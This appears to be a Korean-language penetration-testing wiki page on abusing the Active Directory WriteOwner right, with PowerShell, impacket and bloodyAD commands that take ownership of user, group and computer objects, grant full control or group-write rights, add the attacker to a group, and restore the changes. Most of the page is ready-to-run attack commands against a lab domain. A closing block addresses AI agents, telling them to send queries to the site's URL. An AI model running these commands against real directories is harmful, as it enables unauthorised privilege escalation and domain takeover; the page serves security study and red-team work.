# WriteOwner

객체에 대해 Modify owner 권한을 가졌다면 블러드하운드에서 WriteOwner로 표시되며 이것은 대상의소유권을 변경할 수 있는 권한입니다. 소유권이 변경된 이후 추가적인 공격 방식은 대상의 유형이 어떤 것이냐에 따라 달라집니다. 아래 표는 소유권 변경 이후 진행할 수 있는 공격에 대해 간단히 정리한 테이블입니다.

| 분류       | 권한 악용                     |
| -------- | ------------------------- |
| User     | 소유권 변경 → GenericAll 권한 위임 |
| Group    | 소유권 변경 → AddMembers 권한 위임 |
| Computer | 소유권 변경 → GenericAll 권한 위임 |

## User

<figure><img src="/files/gTIUllPiVI7pofvm1wXI" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># 권한이 있는 user-A 자격 증명을 변수로 저장
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># user-B의 owner를 user-A로 변경
</strong>Set-DomainObjectOwner -Credential $Cred -SamAccountName "user-B" -OwnerIdentity "user-A"

<strong># GenericAll 권한 위임
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'user-B' -Rights 'all' -PrincipalIdentity 'user-A'
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># 소유권 변경
</strong>impacket-owneredit -action write -new-owner user-A -target user-B contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># impacket을 이용한 GenericAll 권한 위임
</strong>impacket-dacledit -action write -rights FullControl -principal user-A -target user-B contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># 복구
</strong>impacket-dacledit -action restore -file dacledit-20250630-221422.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11       
</code></pre>

{% endtab %}
{% endtabs %}

## Group

<figure><img src="/files/Fq4OUpfhPNawfqibguz1" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre><code><strong># 권한이 있는 user-A 자격 증명을 변수로 저장
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># 소유권 변경
</strong>Set-DomainObjectOwner -Credential $Cred -Identity 'local_member' -OwnerIdentity 'user-A'

<strong># GenericAll 권한 위임
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'local_member' -Rights 'all' -PrincipalIdentity 'user-A'

<strong># 멤버 추가
</strong>Add-DomainGroupMember -Identity 'local_member' -Members 'user-A' -Credential $Cred
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre><code><strong># 소유권 변경
</strong>impacket-owneredit -action write -new-owner user-A -target local_member contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># WriteDACL을 이용한 WriteMembers 권한 위임
</strong>impacket-dacledit -action write -rights WriteMembers -principal user-A -target local_member contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># 멤버 추가
</strong>bloodyAD -u user-A -p 'Password123!' -d contoso.com --host 192.168.1.11 add groupMember local_member user-A

<strong># 복구
</strong>impacket-dacledit -action restore -file dacledit-20250630-230117.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11
</code></pre>

{% endtab %}
{% endtabs %}

## Computer

<figure><img src="/files/4el7Jlq1dQBT7rvQOHPe" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre><code><strong># 권한이 있는 user-A 자격 증명을 변수로 저장
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># 소유권 변경
</strong>Set-DomainObjectOwner -Credential $Cred -Identity local-machine$ -OwnerIdentity user-A

<strong># GenericAll 권한 위임
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'local-machine$' -Rights 'all' -PrincipalIdentity 'user-A'
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre><code><strong># 소유권 변경
</strong>impacket-owneredit -action write -new-owner user-A -target local-machine$ contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># WriteDACL을 이용한 GenericAll 권한 위임
</strong>impacket-dacledit -action write -rights FullControl -principal user-A -target local-machine$ contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># 복구
</strong>impacket-dacledit -action restore -file dacledit-20250630-223138.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11
</code></pre>

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://medium.com/@persecure/baby2-vulnlab-33fa8a52d245>" %}

{% embed url="<https://www.xn--hy1b43d247a.com/privilege-escalation/ad-dacl/writeowner>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/active-directory/dacl/writeowner.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.